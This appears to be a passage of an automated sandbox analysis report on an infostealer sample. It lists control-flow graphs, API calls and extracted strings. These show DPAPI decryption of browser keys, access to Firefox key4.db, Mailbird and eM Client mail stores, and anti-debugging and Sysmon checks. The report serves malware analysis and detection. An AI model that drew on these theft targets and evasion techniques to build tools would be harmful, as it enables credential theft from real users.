4263b6-4263bb 6238->6263 6239->6194 6279 4269d1-4269d6 6240->6279 6280 42654a-426572 call 424995 6240->6280 6241->6268 6328 4269a1 6241->6328 6242->6194 6264 4266d1-4266e8 6242->6264 6243->6268 6312 4267f9-4267fe 6243->6312 6265 426803-42681f 6244->6265 6266 426420-426425 6244->6266 6245->6194 6267 426703-42670a 6245->6267 6246->6194 6247->6194 6248->6194 6283 426598-42659f 6248->6283 6249->6194 6284 4265ba-4265d9 call 426a09 6249->6284 6250->6194 6285 426729-42673a 6251->6285 6286 4262fd-426302 6251->6286 6252->6268 6269 42671f-426724 6252->6269 6253->6194 6271 42683b-426842 6254->6271 6272 426469-42646e 6254->6272 6255->6194 6288 426600-426611 GetPEB 6255->6288 6256->6194 6257->6194 6258->6268 6294 426760-426765 6258->6294 6259->6194 6290 426377-42637b 6259->6290 6260->6194 6261->6268 6330 4266b1-4266b6 6261->6330 6262->6268 6295 4267ca-4267cf 6262->6295 6263->6194 6292 4263c1-4263ef LoadLibraryA 6263->6292 6264->6194 6265->6194 6266->6194 6293 42642b-426443 call 41eba8 call 41f9a4 6266->6293 6267->6194 6268->6194 6269->6268 6270->6268 6271->6194 6272->6194 6296 426474-426495 call 41eb3f 6272->6296 6274->6194 6298 4264d1-4264de call 422817 6274->6298 6275->6268 6300 42689a-42689f 6275->6300 6277->6194 6278->6194 6301 42650f-426524 6278->6301 6279->6194 6307 4269dc-4269e3 6279->6307 6280->6268 6322 426578-42657d 6280->6322 6281->6268 6283->6194 6284->6230 6285->6194 6286->6194 6305 426304-42632a call 422817 call 4244e4 6286->6305 6288->6194 6317 42637e-426385 6290->6317 6292->6194 6293->6283 6294->6268 6295->6268 6296->6268 6327 42649b-4264a0 6296->6327 6298->6267 6299->6194 6300->6268 6301->6194 6305->6300 6333 426330 6305->6333 6312->6268 6317->6194 6322->6268 6327->6268 6328->6268 6330->6268 6333->6268
                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: A8r$SysmonDrv$dll$fltl$ib.d
                                                              • API String ID: 1029625771-1616023887
                                                              • Opcode ID: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                              • Instruction ID: eb42a9731a47ced65949ee17454b9c50096d91694aa44b165600d0182d074a5f
                                                              • Opcode Fuzzy Hash: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                              • Instruction Fuzzy Hash: E7E1D5B1709220DBCB24AB18E68572E76E5EB80304FA65D1FF485CB350D63DC9829B5B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M0@$UL6T$VL6T
                                                              • API String ID: 0-769956738
                                                              • Opcode ID: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                              • Instruction ID: 5b652a97159c1cfdc4854cd4c98ad9d0b798284c57e6c6df073e9b00d242a01e
                                                              • Opcode Fuzzy Hash: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                              • Instruction Fuzzy Hash: 0032A871D1051B8BCF289A98878D57EB6B0AB54350B24063BE915FB3D0D3BCCE419B9B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6767 40b129-40b139 6768 40b13c-40b144 6767->6768 6769 40b146-40b14b 6768->6769 6770 40b17e-40b183 6768->6770 6773 40b1b7-40b1bc 6769->6773 6774 40b14d-40b152 6769->6774 6771 40b215-40b21a 6770->6771 6772 40b189-40b18e 6770->6772 6775 40b220-40b225 6771->6775 6776 40b359-40b35e 6771->6776 6777 40b194-40b199 6772->6777 6778 40b2db-40b2e0 6772->6778 6779 40b1c2-40b1c7 6773->6779 6780 40b32c-40b331 6773->6780 6781 40b2a5-40b2aa 6774->6781 6782 40b158-40b15d 6774->6782 6785 40b4a9-40b4c2 6775->6785 6786 40b22b-40b230 6775->6786 6791 40b360-40b365 6776->6791 6792 40b395-40b3b8 6776->6792 6787 40b40f-40b414 6777->6787 6788 40b19f-40b1a4 6777->6788 6783 40b601-40b607 call 40a928 6778->6783 6784 40b2e6-40b2eb 6778->6784 6793 40b4c7-40b4cc 6779->6793 6794 40b1cd-40b1d2 6779->6794 6789 40b646-40b65b 6780->6789 6790 40b337-40b33c 6780->6790 6795 40b2b0-40b2b5 6781->6795 6796 40b584-40b5a7 call 40a928 6781->6796 6797 40b163-40b168 6782->6797 6798 40b3c8-40b3cd 6782->6798 6828 40b60c-40b616 6783->6828 6812 40b2f1-40b2f6 6784->6812 6813 40b61b-40b641 call 438e28 6784->6813 6785->6768 6801 40b236-40b23b 6786->6801 6802 40b569-40b574 6786->6802 6804 40b710-40b73f call 40b129 6787->6804 6805 40b41a-40b41f 6787->6805 6816 40b541-40b55e 6788->6816 6817 40b1aa-40b1af 6788->6817 6806 40b661-40b666 6789->6806 6807 40b746-40b749 6789->6807 6818 40b342-40b347 6790->6818 6819 40b66b-40b6a6 call 40b81c call 40a928 6790->6819 6820 40b6ab-40b6ca 6791->6820 6821 40b36b-40b370 6791->6821 6792->6807 6825 40b3be-40b3c3 6792->6825 6814 40b4d2-40b4f3 6793->6814 6815 40b74e-40b753 6793->6815 6822 40b494-40b497 6794->6822 6823 40b1d8-40b1dd 6794->6823 6808 40b5b2-40b5f1 call 40b81c call 40b7bb 6795->6808 6809 40b2bb-40b2c0 6795->6809 6796->6806 6866 40b5ad 6796->6866 6810 40b503-40b532 6797->6810 6811 40b16e-40b173 6797->6811 6799 40b6d3-40b6fc 6798->6799 6800 40b3d3-40b3d8 6798->6800 6834 40b703-40b70b call 40b81c 6799->6834 6835 40b6fe 6799->6835 6800->6768 6840 40b3de-40b404 call 40b129 6800->6840 6801->6768 6827 40b241-40b295 call 40b129 call 40b81c 6801->6827 6802->6807 6851 40b57a-40b57f 6802->6851 6804->6807 6849 40b741 6804->6849 6805->6768 6841 40b425-40b470 call 438e28 call 447e24 6805->6841 6806->6807 6807->6768 6808->6807 6880 40b5f7-40b5fc 6808->6880 6809->6768 6830 40b2c6-40b2cc 6809->6830 6845 40b534 6810->6845 6846 40b539-40b53c 6810->6846 6811->6768 6843 40b175-40b17c 6811->6843 6812->6768 6832 40b2fc-40b321 6812->6832 6813->6768 6814->6807 6844 40b4f9-40b4fe 6814->6844 6815->6768 6839 40b759-40b7ba NtReadFile call 438e28 NtClose 6815->6839 6816->6849 6850 40b564 6816->6850 6847 40b1b5 6817->6847 6848 40b2cf-40b2d6 6817->6848 6818->6768 6836 40b34d-40b354 6818->6836 6819->6768 6820->6807 6833 40b6cc-40b6d1 6820->6833 6821->6768 6838 40b376-40b381 6821->6838 6842 40b498 6822->6842 6823->6768 6852 40b1e3-40b210 call 447047 call 447e24 6823->6852 6825->6807 6827->6807 6884 40b29b-40b2a0 6827->6884 6828->6768 6830->6848 6832->6806 6858 40b327 6832->6858 6833->6807 6834->6768 6835->6834 6836->6768 6838->6822 6861 40b387-40b38f 6838->6861 6840->6849 6878 40b40a 6840->6878 6886 40b475-40b48f 6841->6886 6842->6842 6843->6768 6844->6807 6845->6846 6846->6768 6847->6768 6848->6768 6849->6807 6850->6807 6851->6807 6852->6768 6858->6807 6861->6785 6861->6792 6866->6807 6878->6807 6880->6807 6884->6807 6886->6768
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,76FCF770,76FCF770), ref: 0040B792
                                                              • NtClose.NTDLL ref: 0040B7B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseFileRead
                                                              • String ID: LK$Y[$ntdll.dll
                                                              • API String ID: 752142053-4222218168
                                                              • Opcode ID: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                              • Instruction ID: 4487220ceab9a8d4c25bfe658470c8f7c93894071a863f051833b6fbd766e42f
                                                              • Opcode Fuzzy Hash: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                              • Instruction Fuzzy Hash: C0E1BDB29043058BDB249F69C59516EBAE1EB85314F25893FE485FB3D0E33C89418B9F
                                                              APIs
                                                                • Part of subcall function 0041F916: VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                              • NtQueryInformationProcess.NTDLL(000000FF,0000001E,?,00000004,00000000), ref: 004223A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Query$InformationProcessVirtual
                                                              • String ID: ]^4$^^4$^^4$^^4
                                                              • API String ID: 1364735940-2923853987
                                                              • Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                              • Instruction ID: e1f5519adcfceb975286f451de33aaf8cbb4e2bcda804772fdea06b08d6dcce1
                                                              • Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                              • Instruction Fuzzy Hash: CD510B31B08271ABDB24891CA68097E62D45B44314FA44D2BFDD9EB328C2ADCDD6974F
                                                              APIs
                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00433288
                                                              • GetSystemMetrics.USER32(00000001), ref: 004333C3
                                                              • GetSystemMetrics.USER32(00000000), ref: 0043341E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MetricsSystem$Create
                                                              • String ID: DISPLAY
                                                              • API String ID: 1087689917-865373369
                                                              • Opcode ID: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                              • Instruction ID: b761a9eed8f132f3d76dd51699d475c40aa8c4f3e32308c58242f5baaa05262b
                                                              • Opcode Fuzzy Hash: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                              • Instruction Fuzzy Hash: EA513672D041059BEF208F588845ABFB6A4EB9D312F34B563E516EB350D278CF814B9B
                                                              APIs
                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00405575
                                                              Strings
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 00405526, 004055F4, 004057CF
                                                              • crypt32.dll, xrefs: 00405558, 004059AF
                                                              • os_c576xedrypt.encry576xedpted_key, xrefs: 00405A29
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$crypt32.dll$os_c576xedrypt.encry576xedpted_key
                                                              • API String ID: 834300711-3884854554
                                                              • Opcode ID: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                              • Instruction ID: 8c3ac9f04a9491c7941596228a2b8d17953981cc6a452a8cfbc5ca82bdd136a5
                                                              • Opcode Fuzzy Hash: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                              • Instruction Fuzzy Hash: 4402B4B1E00A098FDF249A98DC816BFBB74EB14314F24457BE915FA3E0D37989418F5A
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?,E3E203CD), ref: 004020D7
                                                              • ExitProcess.KERNEL32 ref: 00402428
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcessSleep
                                                              • String ID: Ku^%$Ku^%
                                                              • API String ID: 911557368-1067927601
                                                              • Opcode ID: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                              • Instruction ID: 7c1692d81d369eac2294152011f0ccab71a19272a549e25e1d59810d67b13e6b
                                                              • Opcode Fuzzy Hash: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                              • Instruction Fuzzy Hash: 82A1E571500B058BD7348E29D68862B76E0AB41714B248D3FE55BFBBE0D6FCE8459B0B
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,0043047B), ref: 0042F315
                                                              • lstrcatW.KERNEL32(?,\key4.db), ref: 0042F31F
                                                              Strings
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0042F2C3
                                                              • \key4.db, xrefs: 0042F317
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$\key4.db
                                                              • API String ID: 4038537762-486154972
                                                              • Opcode ID: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                              • Instruction ID: 3d8cc84be03ebf0018643bd6ad0f3ea75a9045ade11442e12932e6ab408eecf0
                                                              • Opcode Fuzzy Hash: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                              • Instruction Fuzzy Hash: C37198A6F0012996DF249968BC4157F23B16B92710FF40977E005DB391E27ECD8987AF
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL(000000FF,0000001F,?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004227D5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID: 9a%^$M%$M%
                                                              • API String ID: 1778838933-3204844187
                                                              • Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                              • Instruction ID: a14d1243167b6357461e6519a130038910b412cbb64089044718b0755659bab4
                                                              • Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                              • Instruction Fuzzy Hash: 5A819875F04229ABCF28DF58EAD06ADB7B0AB24300FE48557D451E7351D2BC8A81CB4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %localappdata%\Mailbird\Store$*.db$Mail Clients\Mailbird$\MessageIndex$kernel32.dll
                                                              • API String ID: 0-4169501468
                                                              • Opcode ID: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                              • Instruction ID: 37c33aadf0b1a5fededcf733a2f710a0aa0d7e8b715308be68c7b56e9875aa70
                                                              • Opcode Fuzzy Hash: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                              • Instruction Fuzzy Hash: C21209B1F4022A8BDF149B98A8C25BF7661EF10314FA4452BE411FA391D72D8A41CBDF
                                                              APIs
                                                              • lstrcmpiW.KERNELBASE(?,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0043B7A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcmpi
                                                              • String ID: VL6T$VL6T$kernel32.dll
                                                              • API String ID: 1586166983-858732239
                                                              • Opcode ID: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                              • Instruction ID: ac9e96eee08e7f4766fdf27955405b0e073298ede107f6bf942f2813ff7035d8
                                                              • Opcode Fuzzy Hash: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                              • Instruction Fuzzy Hash: F912BA71D045198BCF28CA5988967BEB6B0EB1D300F24651BDA06EB760D73CDD818BDB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat
                                                              • String ID: UL6T$VL6T$VL6T$kernel32.dll
                                                              • API String ID: 4038537762-2028718673
                                                              • Opcode ID: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                              • Instruction ID: c2102a5980ece967c5cd64c746778263c5b3406957fe7555e788f878a3f1dfdb
                                                              • Opcode Fuzzy Hash: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                              • Instruction Fuzzy Hash: 99420BB1D001199BDF288A98C8656BF76B0AB18310F241767E915FB3D0D37C8E95CB9B
                                                              Strings
                                                              • TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0043927A, 00439351
                                                              • gU@, xrefs: 0043935E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$gU@
                                                              • API String ID: 0-1743506205
                                                              • Opcode ID: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                              • Instruction ID: 9bb5ed087af5853c8395ebcf4a55f6806a95a7423fdc301e10d6eb9c751f7a08
                                                              • Opcode Fuzzy Hash: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                              • Instruction Fuzzy Hash: 4FE1D871D042198BDF249B6888826BEBA70BB1D310F24252FE559FB390D77CCD418B9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                              • API String ID: 0-1928883120
                                                              • Opcode ID: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                              • Instruction ID: 9be5ae4bf1e72463837e643df42d36053b45937ac977a5871966d9d3f700dc7e
                                                              • Opcode Fuzzy Hash: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                              • Instruction Fuzzy Hash: 5CE14DB1F4012A8BDF189E54FD822BF7662AB14304FA4052BE015FA395E73DCA4187DB
                                                              APIs
                                                                • Part of subcall function 0044E224: RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                                • Part of subcall function 0044E224: GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                              • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFreeHeapInformationLastTimeZone
                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                              • API String ID: 3335090040-239921721
                                                              • Opcode ID: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                              • Instruction ID: 7ab12ca904d85c611abf05cc92b1328e63041ffa610859c45aae75821d6d65e9
                                                              • Opcode Fuzzy Hash: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                              • Instruction Fuzzy Hash: DA3159B2D00115ABCB11AFA6DC4695ABB74EF05797F10406BF804A7162E7789F04CB99
                                                              APIs
                                                              • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: ntdll.dll
                                                              • API String ID: 3535843008-2227199552
                                                              • Opcode ID: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                              • Instruction ID: 07c00f1c427ac074378915b2824e934ab5066280a98a6b1b7d7a0ad64244f161
                                                              • Opcode Fuzzy Hash: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                              • Instruction Fuzzy Hash: 7DF0E992A0016279E6106A669C0197B768CDE86361F144533F815E73D1E33C8E0192FE
                                                              APIs
                                                              • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: ntdll.dll
                                                              • API String ID: 3535843008-2227199552
                                                              • Opcode ID: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                              • Instruction ID: f273f3d0fb77e3baaf18c0c5406a57793bb7cae49ecc4258f7fe46d16d2ae272
                                                              • Opcode Fuzzy Hash: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                              • Instruction Fuzzy Hash: 08C08063F8102166850175D47C035AD631CD9D8337F1C4437F91AF2301F525161D01FB
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0097A2A6
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0097A2C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, Offset: 00979000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_979000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: 9ada0ad67fa060f65aef6af0b80b9f15648bcf5544009763e3386b987eff8959
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: C4F06232100711BBD7202BB5988DB6E76ECAF89724F104529E65A914C1DA75EC458A62
                                                              APIs
                                                              • NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 00424811
                                                                • Part of subcall function 004262A1: LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InformationLibraryLoadQuerySystem
                                                              • String ID:
                                                              • API String ID: 1217483125-0
                                                              • Opcode ID: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                              • Instruction ID: a7ee391c1cc3a25a3919c4d00fef5949a9432234e98ec336f1522245060c6ad6
                                                              • Opcode Fuzzy Hash: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                              • Instruction Fuzzy Hash: 1471C5B1B08261CBCB24DF18A58112EB6E0FBC5314FA65D1FE496EB351D63CC8858B5B
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL(000000FF,00000007,FFFFFF06,00000004,00000000), ref: 00421F7A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
